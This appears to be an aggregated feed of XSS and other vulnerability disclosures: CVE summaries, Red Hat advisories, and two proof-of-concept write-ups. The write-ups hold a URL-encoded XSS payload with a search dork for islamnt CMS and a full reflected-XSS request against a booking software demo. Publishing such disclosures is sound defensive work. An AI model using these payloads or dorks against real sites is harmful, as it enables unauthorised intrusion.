A Stored Cross-Site Scripting (XSS) vulnerability while editing the autoreply file page in Usermin 2.000 allows remote attackers to inject arbitrary web script or HTML by editing the forward file manually.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-41159: Usermin-2.000/CVE-2023-41159 at main · shindeanik/Usermin-2.000

An arbitrary file upload vulnerability in Teller Web App v.4.4.0 allows a remote attacker to execute arbitrary commands and obtain sensitive information via uploading a crafted file.

**CVE-2023-42362****Author: Abdelrahman Mohamed (Mr-n0b3dy)****Linked-in: https://www.linkedin.com/in/abdelrhman-mohamed-ashraf-7bb43410b/****Vulnerability Name: Unrestricted File Upload that led to ATO****Severity: High****Product: NCR teller web app****Version: 4.4.0****Description:**

The Unrestricted File Upload leading to Stored Cross-Site Scripting (XSS) vulnerability is a security issue identified within the web application. This vulnerability arises due to a lack of proper input validation in the file upload functionality.

**Impact:**

Attackers can upload a malicious file containing JavaScript code that enables them to hijack the admin session, which is already stored in the local storage. This breach could result in an account takeover of the admin account, granting them full access to administrator functionalities.

**Recommendations:**

Install the latest version of the NCR Teller web app.

CVE-2023-42362: GitHub - Mr-n0b3dy/CVE-2023-42362

A cross-site scripting (XSS) vulnerability in Time to SLA plugin v10.13.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the durationFormat parameter.

CVE-2023-41588: poc2/xss[Time to SLA].md at main · xsn1210/poc2

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yordam MedasPro allows Reflected XSS.This issue affects MedasPro: before 28.



CVE-2023-4676

A cross site scripting issue was discovered with the pagination function on the "Client-based Authentication Policy Configuration" screen of the GreenRADIUS web admin interface. This issue is found in GreenRADIUS v5.1.1.1 and prior. A fix was included in v5.1.2.2.




A cross site scripting issue was discovered with the pagination function on the “Client-based Authentication Policy Configuration” screen of the GreenRADIUS web admin interface. This issue is found in GreenRADIUS v5.1.1.1 and prior. A fix was included in v5.1.2.2.

As always, we recommend that you keep your GreenRADIUS instances updated with the latest versions.

https://www.cve.org/cverecord?id=CVE-2023-4951

CVE-2023-4951: CVE-2023-4951 - Green Rocket Security

An arbitrary file upload vulnerability in the /user/upload component of lenosp 1.0-1.2.0 allows attackers to execute html code via a crafted JPG file.

An arbitrary file upload vulnerability in the /user/upload component of lenosp v1.0-v1.2.0 allows attackers to execute html code via a crafted JPG file.

Log in to the backend system, click on User Management in System Management, and  
create a new user.  
  
Upload a file in image format and change the suffix name of the uploaded file by  
intercepting the data packet.  
  
Upload an HTML file can trigger an XSS vulnerability.  
  
At the code level, it can be seen that the file has been successfully uploaded to the server.

CVE-2023-42180: An arbitrary file upload vulnerability in the /user/upload component  · Issue #I7X760 · 郑州程序员/lenosp - Gitee.com

A flaw was found in undertow. This issue makes achieving a denial of service possible due to an unexpected handshake status updated in SslConduit, where the loop never terminates.

Issued:

2023-06-27

Updated:

2023-06-27

**RHSA-2023:3892 - Security Advisory**

*   Overview

**Synopsis**

Important: Red Hat Single Sign-On 7.6.4 security update

**Type/Severity**

Security Advisory: Important

**Topic**

A security update is now available for Red Hat Single Sign-On 7.6 from the Customer Portal.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.  

This release of Red Hat Single Sign-On 7.6.4 serves as a replacement for Red Hat Single Sign-On 7.6.3, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.  

Security Fix(es):  

*   keycloak: Cross-site scripting when validating URI-schemes on SAML and OIDC (CVE-2022-4361)
*   keycloak: oauth client impersonation (CVE-2023-2422)
*   keycloak: Untrusted Certificate Validation (CVE-2023-1664)
*   undertow: Infinite loop in SslConduit during close (CVE-2023-1108)
*   keycloak: client access via device auth request spoof (CVE-2023-2585)
*   xstream: Arbitrary code execution via unsafe deserialization of sun.tracing.\* (CVE-2021-39144)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat Single Sign-On Text-Only Advisories x86\_64

**Fixes**

*   BZ - 1997772 - CVE-2021-39144 xstream: Arbitrary code execution via unsafe deserialization of sun.tracing.\*
*   BZ - 2151618 - CVE-2022-4361 Keycloak | RHSSO: XSS due to lax URI scheme validation
*   BZ - 2174246 - CVE-2023-1108 Undertow: Infinite loop in SslConduit during close
*   BZ - 2182196 - CVE-2023-1664 keycloak: Untrusted Certificate Validation
*   BZ - 2191668 - CVE-2023-2422 keycloak: oauth client impersonation
*   BZ - 2196335 - CVE-2023-2585 keycloak: client access via device auth request spoof

**CVEs**

*   CVE-2021-39144
*   CVE-2022-4361
*   CVE-2023-1108
*   CVE-2023-1664
*   CVE-2023-2422
*   CVE-2023-2585

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2023-1108

islamnt CMS version 2.1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : islamnt CMS v2.1.0 XSS Vulnerability Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://sourceforge.net/projects/islam-cms/                                                                        || # Dork      : Powered By Islamnt 2.1.0                                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /onlines.php/%27onmouseover=%27prompt%28984627%29%27bad=%27%3E[+] http://127.0.0.1/Islam/onlines.php/%27onmouseover=%27prompt%28984627%29%27bad=%27%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

islamnt CMS 2.1.0 Cross Site Scripting

Night Club Booking Software version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Night Club Booking Software-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/09/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the index request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks. Thepayload byymt"><script>alert(1)</script>fs5xr was submitted in the indexparameter. This input was echoed unmodified in the application's response.The attacker can trick the victim into executing arbitrary commands orcode on his machine remotely.STATUS: HIGH-CRITICAL Vulnerability[+]Test Payload:```GET/1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date=HTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178;_gat=1; _fbp=fb.1.1694256177815.1029224882X-Requested-With: XMLHttpRequestReferer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116","Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html)## Time spent:00:05:00

Night Club Booking Software 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-5144-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.122 and .NET Runtime 6.0.22. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: .NET 6.0 security update  
Advisory ID:       RHSA-2023:5144-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5144  
Issue date:        2023-09-13  
CVE Names:         CVE-2023-36799   
=====================================================================

1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 6.0.122 and .NET Runtime  
6.0.22.

Security Fix(es):

* dotnet:  Denial of Service with Client Certificates using .NET Kestrel  
(CVE-2023-36799)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2237317 - CVE-2023-36799 dotnet:  Denial of Service with Client Certificates using .NET Kestrel

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
dotnet6.0-6.0.122-1.el8_8.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.22-1.el8_8.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.22-1.el8_8.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.22-1.el8_8.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.22-1.el8_8.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.22-1.el8_8.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.22-1.el8_8.aarch64.rpm  
dotnet-runtime-6.0-6.0.22-1.el8_8.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.22-1.el8_8.aarch64.rpm  
dotnet-sdk-6.0-6.0.122-1.el8_8.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.122-1.el8_8.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.22-1.el8_8.aarch64.rpm  
dotnet-templates-6.0-6.0.122-1.el8_8.aarch64.rpm  
dotnet6.0-debuginfo-6.0.122-1.el8_8.aarch64.rpm  
dotnet6.0-debugsource-6.0.122-1.el8_8.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.22-1.el8_8.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.22-1.el8_8.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.22-1.el8_8.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.22-1.el8_8.s390x.rpm  
dotnet-hostfxr-6.0-6.0.22-1.el8_8.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.22-1.el8_8.s390x.rpm  
dotnet-runtime-6.0-6.0.22-1.el8_8.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.22-1.el8_8.s390x.rpm  
dotnet-sdk-6.0-6.0.122-1.el8_8.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.122-1.el8_8.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.22-1.el8_8.s390x.rpm  
dotnet-templates-6.0-6.0.122-1.el8_8.s390x.rpm  
dotnet6.0-debuginfo-6.0.122-1.el8_8.s390x.rpm  
dotnet6.0-debugsource-6.0.122-1.el8_8.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.22-1.el8_8.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.22-1.el8_8.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.22-1.el8_8.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.22-1.el8_8.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.22-1.el8_8.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.22-1.el8_8.x86_64.rpm  
dotnet-runtime-6.0-6.0.22-1.el8_8.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.22-1.el8_8.x86_64.rpm  
dotnet-sdk-6.0-6.0.122-1.el8_8.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.122-1.el8_8.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.22-1.el8_8.x86_64.rpm  
dotnet-templates-6.0-6.0.122-1.el8_8.x86_64.rpm  
dotnet6.0-debuginfo-6.0.122-1.el8_8.x86_64.rpm  
dotnet6.0-debugsource-6.0.122-1.el8_8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.22-1.el8_8.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.22-1.el8_8.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.22-1.el8_8.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.122-1.el8_8.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.122-1.el8_8.aarch64.rpm  
dotnet6.0-debuginfo-6.0.122-1.el8_8.aarch64.rpm  
dotnet6.0-debugsource-6.0.122-1.el8_8.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.22-1.el8_8.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.22-1.el8_8.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.22-1.el8_8.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.122-1.el8_8.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.122-1.el8_8.s390x.rpm  
dotnet6.0-debuginfo-6.0.122-1.el8_8.s390x.rpm  
dotnet6.0-debugsource-6.0.122-1.el8_8.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.22-1.el8_8.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.22-1.el8_8.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.22-1.el8_8.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.122-1.el8_8.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.122-1.el8_8.x86_64.rpm  
dotnet6.0-debuginfo-6.0.122-1.el8_8.x86_64.rpm  
dotnet6.0-debugsource-6.0.122-1.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-36799  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlAdTGAAoJENzjgjWX9erEjVoQAIhoh1e9+IIpIU6+MXye2bdH  
EhZeUTzdCO0Ui6w2xyMcWUqyAinW4tSxnIWC4K3YwG3ybFIHrSHGJH+boo6MY8tg  
m5YlOiWMqkAL1rFlJmjPK4EVzObPQIY31C5coT3DZoV1HbX/gzRA1GaDN2Ar1uv4  
er6p5l0MHnIm+zVLF01IIbC8ruD/S8PBequ/0VV0KlW7tVAvcKgTt35u7hlWT6jn  
joHQUCb0yAfRbF/qy5jfliuKsf4vzPQ2PaK8YBeC5kp7MJMlQ0fOUmYZc/kTe+ai  
D3pgMqnPwRu/aU+zTqzdAPU/Y5TeyuJFgoMNH+k85QfUazMHU7ldS30Sx0QqPNP3  
FxshpeL+NYkSHv+RKW3MMVN3qf6VhapaFSL2Nl281Yieut1iPG15GQCOrL+FiiXK  
QiyFDGDySL7DbHpVtOZaGSJ871XASS9oFF6x3kwXssAwmuMrwfHNveIkEvL4s0cr  
iEbeI704nKuzit7H48xgy9wzyH9ufZZ9ezw3TzyVni85c4V7/1SJKOwSFPjFXbte  
uL7EJDHLK3KT4K67oer4s/2TvTKZwo7hhQaVDSo6l1yO4zgr/eniYbqbCTo6iUGx  
/zg13EtLNzRK1y0vYzN/FsXJBLaWe2WDLvCC2zu+E0AVqRtfdBj9ZmjxKbAkfXpL  
e2JGkynGfPhX+5nh0ZrD  
=hfPr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#xss